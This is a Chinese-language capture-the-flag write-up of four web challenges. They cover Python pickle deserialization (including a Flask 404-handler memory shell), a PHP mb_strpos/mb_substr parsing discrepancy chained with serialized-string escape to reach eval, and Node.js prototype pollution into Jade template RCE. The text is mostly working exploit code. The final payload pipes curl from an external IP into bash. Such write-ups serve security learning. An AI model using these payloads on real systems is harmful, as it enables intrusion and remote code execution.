黄河流域挑战赛WEB部分-gxngxngxn

黄河流域公安院校挑战赛WEB部分-gxngxngxn

myfavorPython

pickle反序列话，开启debug，用报错

import os
import pickle
import base64
class A():def __reduce__(self):return (exec,("raise Exception(__import__('os').popen('cat flag.txt').read())",))a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

Python-reverse

import os
import pickle
import base64
class A():def __reduce__(self):return (exec,("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('gxngxngxn')).read()",))a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

打了以后随便访问一个404页面，然后执行命令即可
具体分析看我flask内存马那篇文章
https://www.cnblogs.com/gxngxngxn/p/18181936

逃跑大师

mb_strpos与mb_substr执行差异导致的漏洞，参考

https://www.sonarsource.com/blog/joomla-multiple-xss-vulnerabilities/

原理很简单，就是利用mb_strpos与mb_substr这两个函数对某些不可见字符的解析差异导致的

我们本地搭建个环境试验一下:

<?php
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{$start = mb_strpos($data, "[");echo $start.'<br>';$end = mb_strpos($data, "]");echo $end;return mb_substr($data, $start, $end + 1 - $start);
}
$key = substrstr($_GET[0]."[welcome".$_GET[1]."sdpcsec]");
echo $key;

这里我们正常传个字符可以看到，这个函数会截区[]里面包裹的内容

增加逃逸出一个字符(抽象的mb_strpos)

但是当我们传入%9f时，

可以看到现在截取的就不一样了，竟然后面少了一个字符，前面多了一个字符，我们可以看到start和end的值为0和15

就是说mb_strpos这个函数在遇到%9f这个不可见字符时，会自动忽略，而mb_substr则不会忽略，导致截断的字符串往前移动了一个位置。

减少逃逸出三个字符(神奇的mb_substr)

再来看%f0两个函数是怎么识别的

可以看到mb_strpos函数是正常当成一个字符识别，但是mb_substr就很神奇了，他会把%f0连着后面的三个字符当成一个字符来识别，所以可以看到这里明显是少了三个字符

构造任意字符

那么简单来说就是%9f用来增加一个字符，%f0用来减少三个字符，我们利用这个特性，可以实现任意字符的构造，如下:

成功构造出gxngxngxn，这里是%f0和%9f配合使用

也可以单独使用%9f来实现逃逸

解题

接下来回归题目本身

 <?php
highlight_file(__FILE__);
error_reporting(0);
function substrstr($data)
{$start = mb_strpos($data, "[");$end = mb_strpos($data, "]");return mb_substr($data, $start, $end + 1 - $start);
}
class A{public $A;public $B = "HELLO";public $C = "!!!";public function __construct($A){$this->A = $A;}public function __destruct(){$key = substrstr($this->B . "[welcome sdpcsec" .$this->C . "]");echo $key;eval($key);}
}
if(isset($_POST['escape'])) {$Class = new A($_POST['escape']);$Key = serialize($Class);$K = str_replace("SDPCSEC", "SanDieg0", $Key);unserialize($K);
}
else{echo "nonono";
} 

这里就是利用了这个原理来构造出任意代码执行，套了一个反序列化字符串逃逸，无伤大雅

直接放我的exp脚本:

import os
import re
import requests
#编码
def encode(string):encode_string = ""for char in string:encode_char = hex(ord(char)).replace("0x","%") #先转ASCII编码再转16进制，把0x替换为%# 例如 i+=1 == i=i+1;所以 encode_string = encode_string + encode_charencode_string += encode_char # encode_string += 空字符+结果return encode_string
#exp
def payload(cmd):print("url加密:"+encode(cmd))# 请用url全加密后的cmd替换原来的cmd！！！cmd1=""for i in range(len(cmd)):cmd1 += "$"cmd = cmd1 + cmds = len(cmd)payload1 = '";s:1:"B";s:' + str(s) + ':"' + cmd + '";s:1:"C";s:9:"gxngxngxn";}'payload2 = ""for i in range(len(payload1)):payload2 += 'SDPCSEC'payload2 = payload2 + payload1payload2 = payload2.replace("$", "%9f")print(payload2)exp=payload('system("cat /flag");//')

将得到字符串中的命令用url全加密后替换即可

Ezzz_Proto

const express = require('express');
const lodash = require('lodash');
const path = require('path');
var bodyParser = require('body-parser');const app =  express();
var router = express.Router();app.set('view engine', 'jade');
app.set('views', path.join(__dirname, 'views'));
app.use(bodyParser.json({ extended: true }));app.get('/',function (req, res) {res.send('Hello World');
})app.post('/post',function (req, res) {function merge(target, source) {for (let key in source) {if (key in source && key in target) {merge(target[key], source[key])} else {target[key] = source[key]}}}var malicious_payload = JSON.stringify(req.body);var body = JSON.parse(JSON.stringify(req.body));var a = {};merge(a, JSON.parse(malicious_payload));console.log(a.name);res.render('index.jade', {title: 'HTML',name: a.name || ''});
})
app.listen(1113, () => console.log('Example app listening on port http://127.0.0.1:1113 !'))

看到引入了jade模板，并且/post路由存在明显的原型链污染，很明显是两个结合打jade模板引擎rce

参考文章:

https://www.anquanke.com/post/id/236354/

利用原文中的exp打打，发现不行，于是跟进底层断点调试

发现在此处将visit换成了visitCode,跟进visitCode函数里

发现这里也存在明显的拼接污染，可以rce，只要污染code.buffer为true，val处拼接我们命令执行的代码即可

payload:

{"__proto__":{"compileDebug":true,"self":true,"buffer":1,"val":"global.process.mainModule.constructor._load('child_process').execSync('curl http://81.70.252.29/1.txt|bash')"}}